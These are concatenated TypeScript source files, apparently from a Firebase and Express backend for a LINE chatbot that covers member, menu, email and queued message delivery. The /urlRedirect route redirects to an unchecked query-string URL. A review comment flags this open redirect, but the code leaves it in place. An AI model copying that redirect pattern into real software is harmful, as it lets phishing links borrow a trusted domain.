    let childrenIds = new Array<string>()
    if (!childOrgShapshot.empty) {
        for (const childOrgDoc of childOrgShapshot.docs) {
            const childOrg = childOrgDoc.data() as MemberOrganization
            if (childOrg.type == "department") {
                // BUG FIX: the recursive promise used to be pushed into a
                // local array that was never awaited, so the parent node
                // could be written (and the function return) before the
                // descendants were collected. Await each subtree instead.
                const descendantIds = await calculateChildren(childOrg.id)
                console.log(childOrg.name, descendantIds.length)
                childrenIds.push(...descendantIds)
            } else if (childOrg.type == "member") {
                childrenIds.push(childOrg.memberId)
            }
        }
    }
    // De-duplicate while keeping first-seen order.
    childrenIds = childrenIds.filter((element, index, array) => {
        return array.indexOf(element) == index
    })
    const rootOrgSnapshot = await getReceiverById(parentId)
    if (!rootOrgSnapshot.empty) {
        let rootOrg = rootOrgSnapshot.docs[0].data() as MemberOrganization
        if (rootOrg.type == "department")
            rootOrg.childrenId = childrenIds
        await setReceiver(rootOrg)
    }
    return childrenIds
}<file_sep>/src/services/workService.ts
import { firestore } from "firebase-admin"
import { Work, Task, Item, Flow } from "../model"
const workCollection = firestore().collection("Work")
/** Upserts a Work document (merge-write keyed by work.id). */
export const setWork = (work: Work) =>
    workCollection.doc(work.id).set(work, { merge: true })
/** Upserts a Task document under the given Work. */
export const setTask = (workId: string, task: Task) =>
    workCollection.doc(workId).collection("Task").doc(task.id).set(task, { merge: true })
/** Upserts an Item document under Work/Task. */
export const setItem = (workId: string, taskId: string, itemData: Item) =>
    workCollection
        .doc(workId).collection("Task")
        .doc(taskId).collection("Item")
        .doc(itemData.id).set(itemData, { merge: true })
/** Upserts a Flow document under Work/Task/Item. */
export const setVisitFlow = (workId: string, taskId: string, itemId: string, flowData: Flow) =>
    workCollection
        .doc(workId).collection("Task")
        .doc(taskId).collection("Item")
        .doc(itemId).collection("Flow")
        .doc(flowData.id).set(flowData, { merge: true })
/** Returns every Work document, decoded. */
export const getWorks = async () => {
    const snapshot = await workCollection.get()
    return snapshot.docs.map(doc => doc.data() as Work)
}
/** Returns the Work documents whose name matches exactly. */
export const getWorkByName = async (name: string) => {
    const snapshot = await workCollection.where("name", "==", name).get()
    return snapshot.docs.map(doc => doc.data() as Work)
}
/** Returns every Task under a Work, decoded. */
export const getTasks = async (workId: string) => {
    const snapshot = await workCollection.doc(workId).collection("Task").get()
    return snapshot.docs.map(doc => doc.data() as Task)
}
/** Returns the Tasks under a Work whose name matches exactly. */
export const getTaskByName = async (workId: string, name: string) => {
    const snapshot = await workCollection.doc(workId).collection("Task")
        .where("name", "==", name).get()
    return snapshot.docs.map(doc => doc.data() as Task)
}
/** Returns every Item under Work/Task, decoded. */
export const getItems = async (workId: string, taskId: string) => {
    const snapshot = await workCollection.doc(workId).collection("Task")
        .doc(taskId).collection("Item").get()
    return snapshot.docs.map(doc => doc.data() as Item)
}
/** Returns the Items under Work/Task whose name matches exactly. */
export const getItemByName = async (workId: string, taskId: string, name: string) => {
    const snapshot = await workCollection.doc(workId).collection("Task")
        .doc(taskId).collection("Item")
        .where("name", "==", name).get()
    return snapshot.docs.map(doc => doc.data() as Item)
}
/** Returns the Items under Work/Task whose `id` field matches. */
export const getItemById = async (workId: string, taskId: string, id: string) => {
    const snapshot = await workCollection.doc(workId).collection("Task")
        .doc(taskId).collection("Item")
        .where("id", "==", id).get()
    return snapshot.docs.map(doc => doc.data() as Item)
}
/** Returns the raw query snapshot of Flows with an exact name match. */
export const getFlowByName = (workId: string, taskId: string, itemId: string, name: string) =>
    workCollection.doc(workId).collection("Task")
        .doc(taskId).collection("Item")
        .doc(itemId).collection("Flow")
        .where("name", "==", name).get()
<file_sep>/src/services/eventConfigService.ts
import * as admin from 'firebase-admin';
const eventCollection = admin.firestore().collection("EventConfig");
/** Upserts an EventConfig document (merge-write keyed by event.id). */
export const setEventConfig = (event: any) =>
    eventCollection.doc(event.id).set(event, { merge: true })
// export const setEventMessage = function (eventId: string, message: Metadata) {
//     return eventCollection.doc(eventId).collection("Message").add(message)
// }
/** Fetches a single EventConfig document snapshot by id. */
export const getEventConfig = (id: string) =>
    eventCollection.doc(id).get()
// export const getEventById = function (id: string) {
// return eventCollection.doc(id).collection("Message").get()
// }<file_sep>/src/services/menuService.ts
import * as admin from 'firebase-admin';
import { Menu, Item } from '../model';
const menuCollection = admin.firestore().collection("Menu");
/** Upserts a Menu document (merge-write keyed by org.id). */
export const setMenu = (org: Menu) =>
    menuCollection.doc(org.id).set(org, { merge: true })
/** Menu entries directly under the given parent node. */
export const getMenuByParentId = (parentId: string) =>
    menuCollection.where("parentId", "==", parentId).get()
/** Menu entries with an exact `type` match. */
export const getMenuByType = (type: string) =>
    menuCollection.where("type", "==", type).get()
/** Menu entries with an exact `memberId` match. */
export const getMenuByMemberId = (memberId: string) =>
    menuCollection.where("memberId", "==", memberId).get()
/** Menu entries with an exact name match. */
export const getMenuByName = (name: string) =>
    menuCollection.where("name", "==", name).get()
/** Menu entries matching both name and parent. */
export const getMenuByNameAndParentId = (name: string, parentId: string) =>
    menuCollection.where("name", "==", name).where("parentId", "==", parentId).get()
/** Menu entries matching both memberId and parent. */
export const getMenuByMemberIdAndParentId = (memberId: string, parentId: string) =>
    menuCollection.where("memberId", "==", memberId).where("parentId", "==", parentId).get()
/** Every Menu document. */
export const getMenus = () =>
    menuCollection.get()
/**
 * DBsync
 * Hard-coded references to the visit/course Activity sub-collections used by
 * the sync job.
 */
const taskCollection = admin.firestore().collection("Work").doc("d7fa1181-9454-4ee8-8333-21161c574921").collection("Task")
const beforeVisitorActivityCollection = taskCollection.doc("3503d043-78d9-40e0-b7f6-a2de87b2c876").collection("Activity")
const afterVisitorActivityCollection = taskCollection.doc("883cb81c-ecfd-4100-bc62-664c890b3a5f").collection("Activity")
const taskCourseCollection = admin.firestore().collection("Work").doc("befb339f-419c-4834-a023-7405bebb031d").collection("Task")
const beforeCourseActivityCollection = taskCourseCollection.doc("2fb0fbcd-47cf-4cc6-8627-ab7d07921713").collection("Activity")
const afterCourseActivityCollection = taskCourseCollection.doc("4e5d0e3a-afc0-4633-a8b6-1869eaf7afde").collection("Activity")
/** Upserts an activity in the "before visit" collection. */
export const setBeforeActivity = (activity: any) =>
    beforeVisitorActivityCollection.doc(activity.id).set(activity, { merge: true })
/** Upserts an activity in the "after visit" collection. */
export const setAfterActivity = (activity: any) =>
    afterVisitorActivityCollection.doc(activity.id).set(activity, { merge: true })
/** Upserts an activity in the "before course" collection. */
export const setBeforeCourseActivity = (activity: any) =>
    beforeCourseActivityCollection.doc(activity.id).set(activity, { merge: true })
// Upserts an activity in the hard-coded "after course" Activity
// sub-collection (see the DBsync collection refs defined above).
export const setAfterCourseActivity = function (activity: any) {
    return afterCourseActivityCollection.doc(activity.id).set(activity, { merge: true })
}<file_sep>/src/messageRecordWS.ts
import { Router } from "express"
import { firestore } from "firebase-admin"
import * as memberService from "./services/memberService"
import { RecordDetail, MessageRecord } from "./model"
const router = Router()
// Click-tracking redirect: records the click (unless trackId is the reserved
// "system" marker) and forwards the browser to the original URL.
// NOTE(review): `url` comes straight from the query string and is passed to
// res.redirect unchecked — this is an open redirect; consider validating the
// target against a whitelist.
router.get("/urlRedirect", (req, res) => {
    const url = req.query.url
    const trackId = req.query.trackId
    if (trackId != "system") {
        // fire-and-forget so the redirect is not delayed by bookkeeping
        urlOpender(trackId)
    }
    res.redirect(url)
})
// Schedules a session-state transition for the posted member:
// "recent" -> "active" after 60 s, "active" -> "sleep" after 240 s.
// NOTE(review): the log says "5 minutes" but the timeout is 240000 ms
// (4 minutes) — confirm which is intended.
// NOTE(review): the timers live in this process only and are lost on restart.
router.post("/memberTimer", (req, res) => {
    let member = req.body
    if (member.session == "recent") {
        setTimeout(function () {
            console.log("1 minute")
            let newMember = { ...member, session: "active" }
            memberService.setMember(newMember)
        }, 60000)
    }
    else if (member.session == "active") {
        setTimeout(function () {
            console.log("5 minutes")
            let newMember = { ...member, session: "sleep" }
            memberService.setMember(newMember)
        }, 240000)
    }
    res.sendStatus(200)
})
// Bookkeeping for /urlRedirect. The trackId is the concatenation of a
// 20-char MessageRecord id and a RecordDetail id; both documents are loaded
// and rewritten inside nested transactions.
// NOTE(review): the read-count increment is commented out below, so both
// transactions currently rewrite the documents with unchanged data — confirm
// whether the counters should be re-enabled.
// NOTE(review): name looks like a typo for "urlOpener"; it is also called
// from the /urlRedirect handler, so rename both together if you fix it.
const urlOpender = async (trackId: string) => {
    const messageRecordId = trackId.substring(0, 20)
    const recordDetailId = trackId.substring(20)
    const messageRecordRef = firestore().collection("MessageRecord").doc(messageRecordId)
    const recordDetailRef = messageRecordRef.collection("RecordDetail").doc(recordDetailId)
    await firestore().runTransaction(async t1 => {
        await t1.get(messageRecordRef).then(async messageRecordDoc => {
            if (messageRecordDoc.exists) {
                let messageRecord = messageRecordDoc.data() as MessageRecord
                // inner transaction updates the per-receiver detail record
                await firestore().runTransaction(async t2 => {
                    await t2.get(recordDetailRef).then(async recordDetailDoc => {
                        if (recordDetailDoc.exists) {
                            let recordDetail = recordDetailDoc.data() as RecordDetail
                            // if (recordDetail.readTime == null) {
                            //     recordDetail.readTime = new Date().getTime()
                            //     messageRecord.readCount += 1
                            // }
                            await t2.update(recordDetailRef, recordDetail)
                        }
                    })
                })
                await t1.update(messageRecordRef, messageRecord)
            }
        })
    })
    // const messageRecordSnapshot = await getMessageRecordById(messageRecordId)
    // if (messageRecordSnapshot.exists) {
    //     let messageRecord = messageRecordSnapshot.data() as MessageRecord
    //     const recordDetailSnapshot = await getRecordDetailById(messageRecordId, recordDetailId)
    //     if (recordDetailSnapshot.exists) {
    //         let recordDetail = recordDetailSnapshot.data() as RecordDetail
    //         if (recordDetail.readTime == null) {
    //             recordDetail.readTime = new Date().getTime()
    //             messageRecord.readCount += 1
    //             await updateRecordDetail(messageRecordId, recordDetail)
    //             await updateMessageRecord(messageRecord)
    //         }
    //     }
    // }
}
// router.get("/syncGAData", async (req, res) => {
// const records = await getMessageRecord()
// const excuPromises = new Array<Promise<any>>()
// for (const record of records) {
// if (record.label.trackId !== null && record.label.trackId !== "") {
// const messageRecordId = record.label.trackId.substring(0, 20)
// const recordDetailId = record.label.trackId.substring(20)
// if (messageRecordId !== "" && recordDetailId !== "") {
// const recordDetailSnapshot = await getRecordDetailById(messageRecordId, recordDetailId)
// if (recordDetailSnapshot.exists) {
// let recordDetail = recordDetailSnapshot.data() as RecordDetail
// recordDetail.readTime = record.duration
// recordDetail.readCount = record.count
// recordDetail.isRead = true
// excuPromises.push(updateRecordDetail(messageRecordId, recordDetail))
// }
// }
// }
// }
// await Promise.all(excuPromises)
// res.sendStatus(200)
// })
// router.get("/calculate", async (req, res) => {
// const messageRecordsSnapshot = await getMessageRecords()
// if (!messageRecordsSnapshot.empty) {
// for (const messageRecordDoc of messageRecordsSnapshot.docs) {
// let messageRecord = messageRecordDoc.data() as MessageRecord
// const recordDetailsSnapshot = await getRecordDetails(messageRecordDoc.id)
// if (!recordDetailsSnapshot.empty) {
// let readCount = 0
// for (const recordDetailDoc of recordDetailsSnapshot.docs) {
// const recordDetail = recordDetailDoc.data() as RecordDetail
// if (recordDetail.isRead) readCount += 1
// }
// messageRecord.readCount = readCount
// await messageRecordDoc.ref.update(messageRecord)
// }
// }
// }
// res.sendStatus(200)
// })
// const getMessageRecord = async (): Promise<GARecord[]> => {
// const auth = authorize()
// const range = encodeURI("!A16:E")
// const result = await readSheet(auth, gaSpreadsheetId, range)
// const records = new Array<GARecord>()
// for (const row of result) {
// records.push({
// action: row[0],
// label: JSON.parse(row[1]),
// count: parseInt(row[3]),
// duration: parseInt(row[4])
// })
// }
// return records
// }
export default router<file_sep>/src/index.ts
import * as functions from 'firebase-functions';
import * as Express from "express"
import * as Cors from "cors"
import * as Logger from "morgan"
import * as admin from 'firebase-admin';
import { databaseURLPath, serviceAccountPath, storageBucket, prefix, PORT } from './config'
let serviceAccount = require(serviceAccountPath);
// Initialise the Firebase Admin SDK with the service-account credentials
// loaded above; every service module goes through this default app instance.
admin.initializeApp({
    credential: admin.credential.cert(serviceAccount),
    databaseURL: databaseURLPath,
    storageBucket: storageBucket
});
import { path, permit, authentication } from "./securityConfig"
// Opt in to Firestore Timestamp objects (instead of JS Dates) in snapshots.
const settings = { timestampsInSnapshots: true };
admin.firestore().settings(settings);
// Express app: permissive CORS, dev request logging, and a large JSON body
// limit because uploads are posted as JSON payloads.
const app = Express()
app.use(Cors({ origin: true }));
app.use(Logger("dev"))
app.use(Express.json({ limit: '100mb' }));
import webhook from './chatbotWS'
import bindingWS from './bindingWS'
import DriveCrawler from './driveCrawler'
import systemPerformance from './systemPerformance'
import authWS from "./authWS"
import memberParentsWS from "./memberParentsWS"
import healthReportWS from "./healthReport"
import DBsync from './DBsync'
import WorkWS from './workWS'
import MessageRecordWS from "./messageRecordWS"
import pushMessageWS from './pushMessageWS'
import UserWS from "./userWS"
import MemberWS from './memberWS'
import fileWS from './fileWS'
import TemplateWS from "./templateWS"
import PubSubEvent from "./pubSubEvent"
import ReviewMessageWS from "./reviewMessageWS"
// Every request passes the authentication middleware first.
app.use(authentication)
// Health-check endpoint.
app.get(prefix + "/", (req, res) => {
    res.sendStatus(200)
})
// Routers mounted directly under the prefix (legacy flat layout) ...
app.use(prefix + "/", webhook);
app.use(prefix + "/", bindingWS);
app.use(prefix + "/", DriveCrawler);
app.use(prefix + "/", systemPerformance)
app.use(prefix + "/", authWS);
app.use(prefix + "/", memberParentsWS);
app.use(prefix + "/", healthReportWS)
app.use(prefix + "/", DBsync)
app.use(prefix + "/", WorkWS)
app.use(prefix + "/", MessageRecordWS)
// ... and routers with their own sub-path.
app.use(prefix + "/push", pushMessageWS);
app.use(prefix + "/user", UserWS)
app.use(prefix + "/member", MemberWS)
app.use(prefix + "/file", fileWS);
app.use(prefix + "/template", TemplateWS)
app.use(prefix + "/event", PubSubEvent)
app.use(prefix + "/reviewMessage", ReviewMessageWS)
// exports.webservice = functions.https.onRequest(app);
// Port can be overridden from the command line: `node index.js <port>`.
const port = process.argv[2] || PORT
process.on('SIGINT', function () {
    console.log("Caught interrupt signal");
    process.exit();
});
app.listen(port, function () {
    console.log(`Express server listening on port ${port}!`);
});<file_sep>/src/services/emailService.ts
import { createTransport } from "nodemailer"
import Axios from "axios"
import * as driveService from './driveService'
import { appName, emailConfig, backendUrl } from "../config"
import { Member, File } from "../model"
import { Stream } from "stream"
/**
 * Sends one e-mail through Gmail using the OAuth2 credentials from config.
 * The body is sent as HTML; `files` are forwarded as nodemailer attachments.
 * Resolves with "ok" on success, rejects with the transport error otherwise.
 */
export const pushMessage = (email: string, options: { subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }): Promise<any> => {
    // Promise wrapper adapts nodemailer's callback API to async/await.
    return new Promise((resolve, reject) => {
        const transporter = createTransport({
            service: "Gmail",
            auth: {
                type: "OAuth2",
                ...emailConfig
            }
        })
        let mailOptions = {
            from: appName + `<${emailConfig.user}>`,
            to: email,
            subject: options.subject,
            html: options.message,
            attachments: options.files
        }
        transporter.sendMail(mailOptions, error => {
            if (error) reject(error)
            else resolve("ok")
        })
    })
}
/**
 * Builds the e-mail payload for a push message:
 * - subject is "《來自<sender>》" plus the sender's organization path when set
 * - only the FIRST URL found in the body is rewritten through the
 *   /urlRedirect tracking endpoint
 * - newlines become <br> because pushMessage sends the body as HTML
 * NOTE(review): declared async although nothing is awaited — callers receive
 * a Promise either way.
 */
export const toEmailMessage = async (sender: Member, message: string, trackId: string, files?: Array<{filename: string, content: Buffer, encoding: string}>): Promise<{ subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }> => {
    let emailMessage = {
        subject: `《來自${sender.name}》`,
        message: message,
        files: files
    }
    if (message) {
        const urls = getURLfromString(message)
        if (urls)
            emailMessage.message = emailMessage.message.replace(urls[0], `<a href="${backendUrl}urlRedirect?trackId=${trackId}&url=${urls[0]}">${urls[0]}</a>`)
        emailMessage.message = emailMessage.message.replace(/\n/g, "<br>")
        if (sender.path)
            emailMessage.subject += sender.path
    }
    return emailMessage
}
/**
 * Downloads each Drive file and shapes it as a nodemailer attachment.
 * A fresh access token is requested per file so long batches do not outlive
 * a single token.
 * NOTE(review): with responseType "stream" Axios returns a Stream, not a
 * Buffer — nodemailer accepts streams as attachment content, but the cast
 * and the declared return type are misleading; confirm before relying on
 * Buffer semantics.
 */
export const getEmailFiles = async (files: File[]): Promise<Array<{filename: string, content: Buffer, encoding: string}>> => {
    const emailFiles = []
    const auth = await driveService.authorize()
    for (const file of files) {
        const token = await auth.refreshAccessToken()
        const fileStream = await Axios.get(`https://www.googleapis.com/drive/v3/files/${file.id}?alt=media`, {
            responseType: "stream",
            headers: {
                "Authorization": "Bearer " + token.credentials.access_token,
                "Content-Type": file.mimeType
            }
        }).then(result => {
            return result.data as Buffer
        })
        emailFiles.push({
            filename: file.fullName,
            content: fileStream,
            encoding: "base64"
        })
    }
    return emailFiles
}
/**
 * Returns the RegExp match array for the first URL-looking substring in
 * `message` (index 0 is the matched URL), or null when nothing matches.
 */
const getURLfromString = (message: string): string[] => {
    // Fresh literal per call, so the /g flag's lastIndex state never leaks
    // between invocations.
    const urlPattern = /[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi
    return urlPattern.exec(message)
}
// import { createTransport } from "nodemailer"
// import Axios from "axios"
// import * as driveService from './driveService'
// import { appName, emailConfig } from "../config"
// import { Member, File } from "../model"
// export const pushMessage = (email: string, options: { subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }): Promise<any> => {
// return new Promise((resolve, reject) => {
// const transporter = createTransport({
// service: "Gmail",
// auth: {
// type: "OAuth2",
// ...emailConfig
// }
// })
// let mailOptions = {
// from: appName + `<${emailConfig.user}>`,
// to: email,
// subject: options.subject,
// text: options.message,
// attachments: options.files
// }
// transporter.sendMail(mailOptions, error => {
// if (error) reject(error)
// else resolve("ok")
// })
// })
// }
// export const toEmailMessage = async (sender: Member, message: string, files?: Array<{filename: string, content: Buffer, encoding: string}>): Promise<{ subject: string, message: string, files?: Array<{ filename: string, content: Buffer, encoding: string }> }> => {
// let emailMessage = {
// subject: `《來自${sender.name}》`,
// message: message,
// files: files
// }
// if (message) {
// emailMessage.message = message
// if (sender.path)
// emailMessage.subject += sender.path
// }
// return emailMessage
// }
// export const getEmailFiles = async (files: File[]): Promise<Array<{filename: string, content: Buffer, encoding: string}>> => {
// const emailFiles = []
// const auth = await driveService.authorize()
// for (const file of files) {
// const token = await auth.refreshAccessToken()
// const fileStream = await Axios.get(`https://www.googleapis.com/drive/v3/files/${file.id}?alt=media`, {
// responseType: "stream",
// headers: {
// "Authorization": "Bearer " + token.credentials.access_token,
// "Content-Type": file.mimeType
// }
// }).then(result => {
// return result.data as Buffer
// })
// emailFiles.push({
// filename: file.fullName,
// content: fileStream,
// encoding: "base64"
// })
// }
// return emailFiles
// }<file_sep>/src/services/memberService.ts
import * as admin from 'firebase-admin';
import { idLength } from '../config'
import { Member } from '../model';
const memberCollection = admin.firestore().collection("Member");
export const getMembers = function () {
return memberCollection.where("role", "==", "staff").get()
}
export const getCustomers = function () {
return memberCollection.where("role", "==", "customer").get()
}
export const getStudents = function () {
return memberCollection.where("role", "==", "student").get()
}
export const deleteMember = function (id: string) {
return memberCollection.doc(id).delete()
}
export const setMember = function (member: Member) {
return memberCollection.doc(member.id).set(member, { merge: true })
}
export const getMemberByAnyId = function (id: string) {
if (id.length == idLength.LINE)
return memberCollection.where("lineId", "==", id).get()
if (id.length == idLength.WECHAT)
return memberCollection.where("wechatId", "==", id).get()
return memberCollection.where("id", "==", id).get()
}
export const getMembersByName = function (companyName: string) {
return memberCollection.where("name", "==", companyName).get()
}
export const getMembersByType = function (companyName: string) {
return memberCollection.where("type", "==", companyName).get()
}
export const getMembersByRole = function (companyName: string) {
return memberCollection.where("role", "==", companyName).get()
}
/** Members matching both a role and an email address. */
export const getMemberByRoleAndEmail = (role: string, email: string) =>
    memberCollection.where("role", "==", role).where("email", "==", email).get()
/** Members matching an email address. */
export const getMemberByEmail = (email: string) =>
    memberCollection.where("email", "==", email).get()
/** Members matching a mobile phone number. */
export const getMemberByMobilePhone = (mobilePhone: string) =>
    memberCollection.where("mobilePhone", "==", mobilePhone).get()
/** Members matching a business phone number. */
export const getMembersByBusinessPhone = (businessPhone: string) =>
    memberCollection.where("businessPhone", "==", businessPhone).get()
/** Members matching both an email address and a mobile phone number. */
export const getMemberByEmailAndMobilePhone = (email: string, mobilePhone: string) =>
    memberCollection
        .where("email", "==", email)
        .where("mobilePhone", "==", mobilePhone)
        .get()
/** Members matching both a mobile phone number and a name. */
export const getMemberByMobilePhoneAndName = (mobilePhone: string, name: string) =>
    memberCollection
        .where("mobilePhone", "==", mobilePhone)
        .where("name", "==", name)
        .get()
/** Write a member document as-is (no merge: missing fields are removed). */
export const setData = (result: Member) =>
    memberCollection.doc(result.id).set(result)
/** Members matching both an internal id and a name. */
export const getMemberByIdAndName = (id: string, name: string) =>
    memberCollection.where("id", "==", id).where("name", "==", name).get()
/** Remove the Firebase Auth user created for this LINE id. */
export const deleteFirebaseToken = (lineId: string) => admin.auth().deleteUser(lineId)

/**
 * Mint a Firebase custom auth token for a LINE user.
 * The LINE id doubles as the Firebase uid; the claim marks the provider.
 */
export const generateFirebaseToken = (lineId: string) =>
    admin.auth().createCustomToken(lineId, { LINE: true })

/** Look up the Firebase Auth user registered under this phone number. */
export const checkPhoneAuth = (mobile: string) => admin.auth().getUserByPhoneNumber(mobile)

/** Persist the login error counter on the member doc keyed by phone. */
export const updateMemberErrorCounter = (phone: string, errorCounter: number) =>
    memberCollection.doc(phone).update({ errorCounter: errorCounter })
import * as admin from 'firebase-admin';
import { idLength } from '../config'
import { ReviewMessage , Receiver} from '../model';
const reviewMessageCollection = admin.firestore().collection("ReviewMessage");
/** Create a review-message document (fails if the id already exists). */
export const createReviewMessage = (reviewMessage: ReviewMessage) =>
    reviewMessageCollection.doc(reviewMessage.id).create(reviewMessage)

/** Add one receiver to a review message's "Receiver" sub-collection. */
export const createReviewMessageReceivers = (reviewMessageId: string, receiver: Receiver) =>
    reviewMessageCollection.doc(reviewMessageId).collection("Receiver").add(receiver)

/** All receivers registered under a review message. */
export const getReviewMessageReceivers = async (reviewMessageId: string): Promise<Receiver[]> => {
    const snapshot = await reviewMessageCollection.doc(reviewMessageId).collection("Receiver").get()
    return snapshot.docs.map(doc => doc.data() as Receiver)
}

/** The review message with this id, or null if none exists. */
export const getReviewMessageById = async (id: string) => {
    const snapshot = await reviewMessageCollection.where("id", "==", id).get()
    if (snapshot.empty) {
        return null
    }
    return snapshot.docs[0].data() as ReviewMessage
}

/** Review messages matching a name. */
export const getReviewMessageByName = (name: string) =>
    reviewMessageCollection.where("name", "==", name).get()

/** Upsert a review message (merge keeps fields not present in the input). */
export const setReviewMessage = (newReviewMessage: ReviewMessage) =>
    reviewMessageCollection.doc(newReviewMessage.id).set(newReviewMessage, { merge: true })

/** Delete the review message with this id. */
export const deleteReviewMessage = (id: string) =>
    reviewMessageCollection.doc(id).delete()
import * as Queue from "bull"
import * as cluster from "cluster"
import * as admin from "firebase-admin"
import * as PubSub from "@google-cloud/pubsub"
import { databaseURLPath, pubsubConfig, serviceAccountPath, storageBucket, redisConfig, MODE } from './config'
import { ScheduleEvent, EventResult } from "./model"
// Firebase must be initialised BEFORE the service modules below are
// imported, because they call admin.firestore() at import time.
let serviceAccount = require(serviceAccountPath);
admin.initializeApp({
    credential: admin.credential.cert(serviceAccount),
    databaseURL: databaseURLPath,
    storageBucket: storageBucket
})
const settings = { timestampsInSnapshots: true }
admin.firestore().settings(settings)
import * as reviewMessageService from "./services/reviewMessageService"
import * as eventService from "./services/eventService"
import uuid = require("uuid");
// Bull queue backed by Redis; jobs are ScheduleEvent payloads.
const q = new Queue(redisConfig.name, { redis: redisConfig })
const numWorkers = 10
const pubsub = PubSub({ keyFilename: pubsubConfig.serviceAccountPath })
if (cluster.isMaster) {
    // Master only forks workers; it does not process jobs itself.
    // NOTE(review): dead workers are logged but not re-forked — confirm
    // whether automatic respawn is wanted.
    for (var i = 0; i < numWorkers; i++) {
        cluster.fork()
    }
    cluster.on('exit', function (worker, code, signal) {
        console.log('worker ' + worker.process.pid + ' died')
    })
} else {
    console.log(`bull server run !`)
    q.on("active", () => {
        console.log(`bull server active !`)
    })
    q.on("waiting", () => {
        console.log(`bull server waiting !`)
    })
    q.on("error", (error) => {
        console.log(`bull server error: ${error.message} !`)
    })
    q.on("failed", (error) => {
        console.log(`bull server fail !`,error)
    })
    // Worker: turn each scheduled review message (state 1 = approved,
    // pending send) into an EventResult, fan out its receivers, publish
    // the event id to Pub/Sub, then mark the message as sent (state 2).
    q.process(async (job) => {
        console.log("Process", JSON.stringify(job.data, null, 4))
        const event: ScheduleEvent = job.data
        let reviewMessageInfo = await reviewMessageService.getReviewMessageById(event.id)
        if (reviewMessageInfo && reviewMessageInfo.state == 1) {
            let newEvent: EventResult = {
                id: uuid.v4(),
                messageId: [],
                content: reviewMessageInfo.content,
                urls: reviewMessageInfo.urls || [],
                channel: reviewMessageInfo.channel,
                sender: reviewMessageInfo.sender,
                // receivers: await reviewMessageService.getReviewMessageReceivers(reviewMessageInfo.id),
                timeStamp: new Date().getTime()
            }
            // console.log(JSON.stringify(newEvent, null, 4))
            await eventService.createEvent(newEvent)
            const receivers = await reviewMessageService.getReviewMessageReceivers(reviewMessageInfo.id)
            // Copy every receiver onto the new event in parallel.
            const memberCheckExecu = new Array<Promise<any>>()
            for (const receiver of await receivers)
                memberCheckExecu.push(eventService.createEventReceiver(newEvent.id, receiver))
            await Promise.all(memberCheckExecu)
            // Downstream subscribers only need the event id + timestamp.
            const data = Buffer.from(JSON.stringify({
                id: newEvent.id,
                timeStamp: newEvent.timeStamp
            }))
            console.log("pub data", {
                id: newEvent.id,
                timeStamp: newEvent.timeStamp
            })
            await pubsub.topic(pubsubConfig.topicName + pubsubConfig.messageTopicName).publisher().publish(data)
            reviewMessageInfo.state = 2
            await reviewMessageService.setReviewMessage(reviewMessageInfo)
        }
    })
}
import * as admin from 'firebase-admin';
import { idLength } from '../config'
import { MemberOrganization } from '../model';
const organizationCollection = admin.firestore().collection("Receiver");
export const setReceiver = function (org: MemberOrganization) {
return organizationCollection.doc(org.id).set(org, { merge: true })
}
export const getReceiverById = function (id: string) {
if (id.length == idLength.LINE)
return organizationCollection.where("member.lineId", "==", id).get()
if (id.length == idLength.WECHAT)
return organizationCollection.where("member.wechatId", "==", id).get()
return organizationCollection.where("id", "==", id).get()
}
export const getReceiverByParentIdAndActivityId = function (parentId: string, activityId: string) {
return organizationCollection
.where("parentId", "==", parentId)
.where("activityId", "==", activityId).get()
}
export const getReceiverByParentId = function (parentId: string) {
return organizationCollection.where("parentId", "==", parentId).get()
}
export const getReceiverByType = function (type: string) {
return organizationCollection.where("type", "==", type).get()
}
export const getReceiverByMemberId = function (memberId: string) {
return organizationCollection.where("memberId", "==", memberId).get()
}
export const getReceiverByName = function (name: string) {
return organizationCollection.where("name", "==", name).get()
}
export const getReceiverByNameAndParentId = function (name: string, parentId: string) {
return organizationCollection.where("name", "==", name).where("parentId", "==", parentId).get()
}
export const getReceiverByMemberIdAndParentId = function (memberId: string, parentId: string) {
return organizationCollection.where("memberId", "==", memberId).where("parentId", "==", parentId).get()
}
export const getReceivers = function () {
return organizationCollection.get()
}<file_sep>/src/services/catalogService.ts
import { firestore } from "firebase-admin"
import { Catalog } from "../model"
const catalogCollection = firestore().collection("Catalog")
/** Upsert a catalog document (merge keeps fields absent from the input). */
export const setCatalog = (work: Catalog) =>
    catalogCollection.doc(work.id).set(work, { merge: true })

// Shared mapper: unwrap a query snapshot into typed Catalog objects.
const toCatalogList = (snapshot: any): Catalog[] =>
    snapshot.docs.map(doc => doc.data() as Catalog)

/** Catalogs owned by a user that match a name. */
export const getCatalogByNameAndUserId = (name: string, userId: string) =>
    catalogCollection
        .where("name", "==", name)
        .where("userId", "==", userId)
        .get()
        .then(toCatalogList)

/** Catalogs owned by a user that match a type. */
export const getCatalogByTypeAndUserId = (type: string, userId: string) =>
    catalogCollection
        .where("type", "==", type)
        .where("userId", "==", userId)
        .get()
        .then(toCatalogList)

/** The catalog(s) with this id (returned as a list, possibly empty). */
export const getCatalogById = (id: string) =>
    catalogCollection.where("id", "==", id).get().then(toCatalogList)

/** Delete the catalog with this id. */
export const deleteCatalog = (id: string) =>
    catalogCollection.doc(id).delete()
import { Client, Message, FlexComponent } from "@line/bot-sdk"
import * as config from '../config';
// import infos from "./info"
import { File, Member, MessageTemplate } from "../model";
const lineClient = new Client(config.LINE)
/** Wrap a plain string in a LINE text-message object. */
export const textMessage = (message: string): Message => ({
    type: "text",
    text: message
})
// export const listMessage = (results: Array<any>) => {
// let list = ""
// for (let i = 0; i < infos.length; i++) {
// const result = (results[i]) ? results[i] : " "
// list += infos[i] + ":" + result + "\n"
// }
// const textMessage: Message = {
// type: "text",
// text: list
// }
// return textMessage
// }
/** Reply to a webhook event using its one-time reply token. */
export const replyMessage = (replyToken: string, lineMessage: Message | Message[]): Promise<any> =>
    lineClient.replyMessage(replyToken, lineMessage)

/** Push one or more messages directly to a LINE user/group id. */
export const pushMessage = (userId: string, lineMessage: Message | Message[]): Promise<any> =>
    lineClient.pushMessage(userId, lineMessage)
/** Text message prefixed with a "from <sender>" banner line. */
export const toLineTextMessage = (sender: Member, message: string): Message => ({
    type: "text",
    text: `《來自${sender.name}》\n` + message
})
/** One quick-reply button: a postback by default, a date picker when `datetime` is set. */
type ReplyOption = { label: string, action: number, displayText?: string, datetime?: boolean }

